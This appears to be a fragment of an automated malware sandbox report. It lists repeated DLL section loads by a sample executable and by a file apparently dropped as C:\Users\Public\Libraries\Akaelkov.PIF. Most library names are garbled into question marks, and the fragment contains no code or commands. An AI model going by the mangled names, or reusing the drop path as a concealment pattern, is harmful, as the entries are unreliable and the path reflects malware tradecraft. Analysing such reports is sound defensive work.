Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ?????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??????s.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
